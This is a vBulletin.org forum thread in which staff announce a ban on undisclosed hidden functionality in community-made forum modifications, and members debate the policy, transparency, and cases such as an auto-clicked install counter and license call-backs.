|
Important: It is all about trust
Most of our members are using vBulletin to provide a Forum on their website(s). What are the reasons people have chosen vBulletin over other similar solutions? There can be many answers to this, but I think there is one that will be on everyone’s list: Trust.
You have bought software from a company that you trust, you are confident that they will provide you with quality software, with no known security issues. If a security issue is found, you’re confident that it will be addressed as soon as possible. Knowing this you can concentrate on your community, instead of being worried about security issues. As your community grows you will find that you have needs for non-standard functionality, or just extra’s that will put your community ahead of your competition. Now here vBulletin.org comes in the picture. Where the vBulletin software itself is created, maintained and supported by ‘professionals’, the vBulletin.org community relies solely on volunteer coders. This gives enthusiast coders to opportunity to contribute to the community and enhance the vBulletin product, making the life of running your own community easier. Where the coders on vBulletin.org might give you professional solutions, they are in some level anonymous, it is not a company that has much to loose in case of a broken trust relationship. They will offer you software solutions, often free of charge, for your Board that you might install without ever seeing (all) of the code that is getting installed on your server. This is even more true with vBulletin 3.5 where most modification are done by simply installing a product file, instead of manually doing code changes. Now where is this post going? You install probably numerous modifications on your board, provided by different coders. By installing software, you give total control of your board in the hands of these ‘anonymous’ coders. This requires a high level of trust towards them. Where common sense, reading other users responses and testing on a Test Board can prevent you from disasters caused by coding errors (hey we are all human) or differences in the environment, there is another vulnerability that you can not so easy protect yourself against: Hidden functionality in the installed modification. Hidden functions that are not documented and/or disclosed by the author can lead to a lot of things, I will try to sum up a few that are possible, some ‘innocent’, some with possible severe consequences. Some possible examples: - A backdoor into your AdminCP - Mailing admin passwords to the authors account. - Call-home functions - Usage tracking - Disruption of service or data - Any other technique that is used in Spyware/Malware type of software. The stand of vBulletin.org Staff is that our members should be able to completely trust the solutions offered here as much as possible. This means that we will not tolerate any form of hidden functionality, since that is the only way we can keep the trust of the members using these solutions. The reason for this thread is that, to our own shame, we received recently reports that there are coders who do incorporate hidden functionalities in their modifications. Lucky the type of hidden functions could be considered as relative harmless, but we will nevertheless not tolerate this. I would like to emphasize that this did not sent any security or privacy related information, nor did it in anyway brake the security of your site. The discovered hidden functionality where aimed at a backdoor in the services of vBulletin.org itself, and have by now been closed. The effect of this functionality will be corrected by us soon. There has been no negative effects on the boards that are using any of these modifications. From the time of this post on we will take the following actions upon discovery of such modifications: - All users who have clicked Install for this modification will be notified about the issue. - The offending modification will be withdrawn immediatly. - Depending on the severity, all modifications submitted by this author could be withdrawn immediate, and the user account of the author could be closed. - Admin will contact the author by mail to inform him and hear his/her side of the story. The vBulletin.org team wants to apologize for any breach of trust this has caused. We hope that our members will be confident that we are addressing these issues seriously and as good as we can and that you can continue to have a trust relation with the authors that offer solutions here at vBulletin.org. vBulletin.org Team |
To all the coders that have currently released modifications that contain such hidden functionality: you are given until June 1st to either remove your modifications or to upload a new version. All modifications found after June 1st with hidden functionality, will be addressed according the steps outlined above!
Staff is still discussing how to handle the benefits that these authors had from releasing this code. Expect the Staff to come with a decision on this soon. |
Is there any possibility that we can get informed witch hacks this is ment to bee?
Ore that the coders can inform in the hacks, that this is happining in theyre hacks? |
wow, my curiosity is killing me!
|
Quote:
I am glad you have raised this Marco and for what it is worth you and the vBorg staff have my full support in this. |
Will you be providing a list of all such (known) hacks - some people may not have clicked on install? I think I have for all the hacks I've installed BUT I'd rather be certain.
|
Quote:
Coders are always free to inform the users in their hack threads, but then it wouldn't be hidden functionality anymore ;) |
what hack in question should we be weary of please??
|
Like mentioned before, we will not disclose this at the present time. Maybe we will disclose it later.
|
You've even got me interested now :D Can you give us further details of what the "hidden function" was? Without revealing the name of the hack/author of course.
ie, did it just do usage tracking? increase the hack thread view count? send an e-mail to the author saying where it had been installed? etc? :) Thanks, Alan. |
Sorry but that is information that i can not disclose at this point.
If it would have sent the author an email where it was installed, we would have considered this as a serious breach of personal confidentiality, and would have taken immediate stronger measurements. |
I know you've replied about not being decided about whether to release the details of hacks with known "back-doors" etc.
However I would like to ask in the strongest possible terms that you do release the information. As you say this is about trust as much as anything else and whilst I can understand it may cause some upset among the coders that coded these hacks however (in this instance) they should not be the primary concern. Especially since it is, to be blunt, their actions that have led to the trust that was built up here being damaged, albeit that I'm sure none of them did it with the intention of causing any such problems. I strongly believe your primary concern should be in regaining the trust of the vast majority of people such as myself. Many people will lose trust in both vBulletin.org and vBulletin itself (because of the link between the two) if everything isn't not only done to rectify this situation, but also is seen to be done. Transparency, when possible, is always the best way to build trust. Please give this some consideration. (Edited to add: I said "back-doors" in the above, I wasn't meaning to imply backdoors into the forums that used the hacks.) Edit MarcoH64: To make it very clear to others reading this: The current issue does not involve a back-door into your forum! If such a thing would have been the case, we would have reacted stronger. |
there shoudl be a hall of shame...
|
I don't think it should be about taking any terrible punitive actions against anyone - according to MarcoH64 these are not hidden features that could cause problems to the majority of us.
However there is the matter of trust - a hack installed from here has the potential to be of concern for quite literally hundreds of thousands of people (considering how many people are members of vBulletin powered forums worldwide that might be an understatement). Jelsoft have (in my opinion) a great reputation for dealing with security issues in their core product in a timely and professional manner - it would be unfortunate for that to be tarnished via this forum, even unintentionally. |
hmmmmmz,
i have a few here.It wouldn't even cross my mind to do a thing like that.Marco are you serious do people really create a hack that does things like you mentioned above ? then they can't be punisched hard enough.A lifetime ban from vbulletin.com and vbulletin.org and immediate licence deactiviation would be a good idea argh that people even think about that maybe they are ipb spys ;) |
The fact that you install any software, could always possibly open you to unknown harmfull actions by the coder of that software. This is not really something new.
We have (until now) never found any hacks released here that had harmfull hidden features. My list is what could possibly happen if someone means harm. PS Even if it is said as a joke, it doesn't look good on us if we would abuse this issue to spread negative feelings about a competitor in the forum business, and i would like to ask all not to make such comments anymore. Let's stick to comments about our own community. |
you know, any of you who know how to read php could always go read the code in the product installs and such and know immediately who is calling external functions from the code. You don't need staff to tell you who the bad guys are.
|
Thanks for letting us know, and thanks for taking action going forward!
|
I'm just a little curious about this.
Most of my products now have a couple of lines that try to click install (or uninstall) automatically when you first install them (or remove them). This is completely harmless (and unreliable) but it's certainly not secret - it has been discussed a number of times without any staff mentioning it broke any rules, and is used by a number of people. I can't believe that this would be what you are referring to as it would be massively OTT with talk of security and backdoors, but perhaps you could clarify if this is covered by this policy or not, since if it is, I will have to remove it. |
Unless you specifically warn the users of such a hack, in the hack thread or the install text before installation, that this will happen, then yes it would fall under the category addressed in this thread. Regardless if you consider this harmless or not.
|
A redirect to the install button isnt really a back-door, nor a security breach especially considering that no coder can tell who the install was or where it came from. No personal or server info could have been passed.
Therefore Im with Paul on that one. If it was submitting info to another site where the author could access the info - then Im with Marco there. Just my thoughts |
I see, so this is okay as long as a note is included in the hack ? In reality, it has not been very useful, it doesn't actually seem to work a lot of the time - so given that it now seems to fall foul of this new policy I think I might just remove it.
|
Quote:
Read the thread title. It is not about if it is harmfull or not. It is not about if the coder could use an auto-install to get privacy sensitive information. It is about breaking the trust of our members by adding hidden functionality to a modification. Period. Now back to your example on a personal level, i think i could give you some reasons in a pm that would also show that even this is disclosing things. |
You calling me Livewire now?!? I'm flattered :D
I assumed that the thread was about users potentially gathering personal data. The threat (as you mentioned) is always there policy or not and yes, I agree that users should be aware. I was only stating that if the catalyst was Paul's hack that redirect to an install link - then I just didn't agree that it would fall under a 'security', 'phishing', 'backdoor' type of policy. Regardless, I guess it is kind of sneaky and it does explain why so many people clicked install on Paul's hacks ;) Now I just need to solve the whole 'last supper/floating hand' mystery and Ill die content. If you have the time and inclination, go for the PM. I'm interested, but I wont be refreshing my inbox every 5 seconds for it as I know you have far more pressing things to get on with :) |
Quote:
The policy is about hidden functionality and trust, not about if it damage anything. PS Don't expect that PM very soon, but will work on it when i have time. |
Quote:
|
sas efharisto
(thats gReek for thank you ;) - Your quoting system is squiffy :D ) |
Dank je (dutch voor thank you)
That is what happens if you rely on manual quoting. ;) PS You only spotted 1 of the 2 quoting "errors" in my previous post. |
I spotted Limewire ;)
|
Quote:
Again, the issue here is that it is about undocumented functionality and that unfortunatly it is to better the author; but no security breach was added to your forum upon installing, nor was any data shared or backdoor installed. And finally, as mentioned in the announcement we will listen to their side of the story. Surely as Paul M suggests his motives were different from a few others. Nevertheless it is something that people have noticed and raised concern about. I think the vBorg staff is on top of things and updated their site policy in regards to these type of things and automatically included optional misuse of undocumented features; Saving them the future discussion of when people decide to do include backdoors or data-mining code, etc. |
Quote:
|
Quote:
I lay all my trust in the coders that gives out there hacks, call me perhaps naive. But i do. And since this is VBorg , i have always tought that this site dident want to bee letting coders do this because of there high reputation as serrious. Quote:
I think i have put to mutch trust in the VBorg following up on this issue. *sorry, fore my bad english* |
BTW - I'm also curious about this - I believe vbulletin itself makes a call back to vbulletin.com everytime you visit your ACP, and passes back your licence code - I don't recall this being mentioned when you install vbulletin, I can't even find it in the licence - does this mean that vB now falls foul of your policy ?
|
I believe that's a bit different because it is the original forum software. They're not going to hard code something in that could trash your board.
Products are 3rd party code though, and you could throw just about anything in there to execute. |
Quote:
Quote:
Any questions in regards to the Jelsoft License Agreement please redirect them outside of vBulletin.org directly to Jelsoft Sales through: http://www.vBulletin.com/go/sales |
Quote:
I am there talking in general, all software. Doesn't mattter if it is a php-script, a windows application, or even an application that a company has coded in-house. |
Quote:
Quote:
|
This clears alot of things up. This is the reason why Paul was getting so much heat in the forums. I'm with Paul and TheGeek on this one. I will add my few lines of thought about the situation and move on.
Attemping to click the install link when you install a product is nothing new. I've seen this in a couple of hacks in the past. It just looks for an image of the install URL and uninstall URL. Its completely harmless and in no way shape or form does this create a sercurty issue for users installing these hacks. You should make that completely clear to the users as your main post seems to direct users that there are flaws in hacks here. Quote:
Either way, I will follow the new rule and I don't think this will be fare to remove accounts as this was never mentioned it the TOS of the vB.org site. Another thing I should add is that emails no longer allow me to uninstall hacks from my email. I had recived an update email and I clicked the uninstall link in the email and I was just redirected back to the portal page. |
Quote:
Quote:
|
While I see the way you are coming at this issue, It isnt uncommonin the real world for free software to include callback functionality. When I release freeware I never have the intent of stealing inforatopn, but because it is free I know that even if it is a small majority, people are prone to remove information that by downloading and using your software they agreed too. Unlike vB most free software lacks proper legal protection and using acallback, harmless as it is, they ensure the integretity of the software hasn't been compromised as by terms of contract.
Now I agee, it isnt a kind thing to do without warning the users first,but those offenders may be code wise and can expect it. It would defeat the purpose of the validation functions. So if you bann us from using such validationhere you should at least afford the codersthe ability to report websites using their hacks released here outside the terms of the hackand have that user face consequences for their actions. While it is trust that keeps users here, it is coders that keep the users here in the first place and sofor both groups protection needs to be afforded I feel, not just one side of the crowd, because alone they don't work together. I hope I made my point clear -Rimer- PS: I have not released any hacks here under this account, but the hacks I have released donot include callbacks as they were ports and not mine originally and thus I did not feel obligated to do it since the original author had not. Hwever if I ever release custom hacks id like to see protection afforded to both sides. |
| All times are GMT. The time now is 06:11 PM. |
Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2025, vBulletin Solutions Inc.
| X vBulletin 3.8.12 by vBS Debug Information | |
|---|---|
|
|
 More Information |
|
|
Template Usage:
Phrase Groups Available:
|
Included Files:
Hooks Called:
|